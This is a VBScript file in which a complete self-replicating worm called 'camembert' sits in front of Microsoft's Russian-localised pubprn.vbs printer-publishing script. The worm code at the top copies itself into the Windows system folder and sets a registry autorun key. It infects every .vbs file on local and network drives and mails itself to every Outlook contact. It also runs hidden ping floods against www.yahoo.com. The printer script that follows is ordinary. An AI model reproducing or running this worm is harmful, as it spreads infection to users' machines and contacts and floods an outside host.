'camembert
'Name : camembert
'Author : Sapeur
On Error Resume Next
Set jfyulg = CreateObject("Scripting.FileSystemObject")
Set gwslxj = CreateObject("WScript.Shell")
Set win = jfyulg.GetSpecialFolder(0)
Set sys = jfyulg.GetSpecialFolder(1)

copyname = sys&"\toto.htm.vbs"
jfyulg.GetFile(WScript.ScriptFullName).Copy(copyname)
gwslxj.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\value_worm",copyname

Set fl = jfyulg.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll
fl.Close
infectfile()
Sub infectfile()
On Error Resume Next
Set jfyulg = CreateObject("Scripting.FileSystemObject")
Set ipjj = jfyulg.Drives
For Each d In ipjj
If d.DriveType = 2 Or d.DriveType = 3 Then
list(d.path&"\")
End If
Next
End Sub

Sub list(doss)
On Error Resume Next
Set jfyulg = CreateObject("Scripting.FileSystemObject")
Set cdjy = jfyulg.GetFolder(doss)
Set fuxjy = cdjy.SubFolders
For Each f1 In fuxjy
infect(f1.Path)
list(f1.Path)
Next
End Sub

Sub infect(doss)
On Error Resume Next
Set jfyulg = CreateObject("Scripting.FileSystemObject")
Set cdjy = jfyulg.GetFolder(doss)
Set fc = cdjy.Files
For Each f1 In fc
ext = jfyulg.GetExtensionName(f1.Path)
ext = lCase(ext)
If (ext = "vbs") Then
    Set cot = jfyulg.OpenTextFile(f1.Path, 1, False)
    If cot.ReadLine <> "'camembert" Then
    cot.Close
    Set cot = jfyulg.OpenTextFile(f1.Path, 1, False)
    vbsorg = cot.ReadAll()
    cot.Close
    Set inf = jfyulg.OpenTextFile(f1.Path, 2, True)
    inf.WriteLine virus
    inf.WriteLine ""
    inf.WriteLine (vbsorg)
    inf.Close
    End If
End If
Next
End Sub

Set xumb = CreateObject("Outlook.Application")
Set egig = xumb.GetNameSpace("MAPI")
For each c In egig.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set uvrhz = xumb.CreateItem(0)
uvrhz.To = c.AddressEntries(d).Address
uvrhz.Subject = "Subject..."
uvrhz.Body = "Body of the worm..."
uvrhz.Attachments.Add(copyname)
uvrhz.Attachments.Add("c:\appswat.exe")
uvrhz.DeleteAfterSubmit = True
If uvrhz.To <> "" Then
uvrhz.Send
End If
Next
End If
Next

gwslxj.Run ("ping.exe -t -l 20000 www.yahoo.com"),vbHide
gwslxj.Run (win&"\ping.exe -t -l 20000 www.yahoo.com"),vbHide

MsgBox "Text of message box",vbinformation,"Title"

'This VBS virus/worm was generated by PVBSWG 1.0


'----------------------------------------------------------------------
'    pubprn.vbs - publish printers from a non Windows 2000 server into Windows 2000 DS
'    
'
'     Arguments are:-
'        server - format server
'        DS container - format "LDAP:\\CN=...,DC=...."
'
'
'    Copyright (c) Microsoft Corporation 1997
'   All Rights Reserved
'----------------------------------------------------------------------

'--- Begin Error Strings ---

Dim L_PubprnUsage1_text
Dim L_PubprnUsage2_text
Dim L_PubprnUsage3_text      
Dim L_PubprnUsage4_text      
Dim L_PubprnUsage5_text      
Dim L_PubprnUsage6_text      

Dim L_GetObjectError1_text
Dim L_GetObjectError2_text

Dim L_PublishError1_text
Dim L_PublishError2_text     
Dim L_PublishError3_text
Dim L_PublishSuccess1_text


L_PubprnUsage1_text      =   "Использование: [cscript] pubprn.vbs server ""LDAP://OU=..,DC=..."""
L_PubprnUsage2_text      =   "       server - Windows-имя сервера (например: Server) или UNC-имя принтера (\\Server\Printer)"
L_PubprnUsage3_text      =   "       ""LDAP://CN=...,DC=..."" - DS-путь конечного контейнера"
L_PubprnUsage4_text      =   ""
L_PubprnUsage5_text      =   "Пример 1: pubprn.vbs MyServer ""LDAP://CN=MyContainer,DC=MyDomain,DC=Company,DC=Com"""
L_PubprnUsage6_text      =   "Пример 2: pubprn.vbs \\MyServer\Printer ""LDAP://CN=MyContainer,DC=MyDomain,DC=Company,DC=Com"""

L_GetObjectError1_text   =   "Ошибка: путь "
L_GetObjectError2_text   =   " не найден."
L_GetObjectError3_text   =   "Ошибка: нет доступа "

L_PublishError1_text     =   "Ошибка: Pubprn не может публиковать принтеры из "
L_PublishError2_text     =   " поскольку он выполняется под управлением Windows 2000 или более новой версии."
L_PublishError3_text     =   "Ошибка публикации принтера "
L_PublishError4_text     =   "Ошибка: "
L_PublishSuccess1_text   =   "Опубликованный принтер: "

'--- End Error Strings ---


set Args = Wscript.Arguments
if args.count < 2 then
    wscript.echo L_PubprnUsage1_text
    wscript.echo L_PubprnUsage2_text
    wscript.echo L_PubprnUsage3_text
    wscript.echo L_PubprnUsage4_text
    wscript.echo L_PubprnUsage5_text
    wscript.echo L_PubprnUsage6_text
    wscript.quit(1)
end if

ServerName= args(0)
Container = args(1)


on error resume next
Set PQContainer = GetObject(Container)

if err then
    wscript.echo L_GetObjectError1_text & Container & L_GetObjectError2_text
    wscript.quit(1)
end if
on error goto 0



if left(ServerName,1) = "\" then

    PublishPrinter ServerName, ServerName, Container

else

    on error resume next

    Set PrintServer = GetObject("WinNT://" & ServerName & ",computer")

    if err then
        wscript.echo L_GetObjectError3_text & ServerName & ": " & err.Description
        wscript.quit(1)
    end if

    on error goto 0


    For Each Printer In PrintServer
        if Printer.class = "PrintQueue" then PublishPrinter Printer.PrinterPath, ServerName, Container
    Next


end if




sub PublishPrinter(UNC, ServerName, Container)

    
    Set PQ = WScript.CreateObject("OlePrn.DSPrintQueue.1")

    PQ.UNCName = UNC
    PQ.Container = Container

    on error resume next

    PQ.Publish(2)

    if err then
        if err.number = -2147024772 then
            wscript.echo L_PublishError1_text & Chr(34) & ServerName & Chr(34) & L_PublishError2_text
            wscript.quit(1)
        else
            wscript.echo L_PublishError3_text & Chr(34) & UNC & Chr(34) & "."
            wscript.echo L_PublishError4_text & err.Description
        end if
    else
        wscript.echo L_PublishSuccess1_text & PQ.Path
    end if

    Set PQ = nothing

end sub

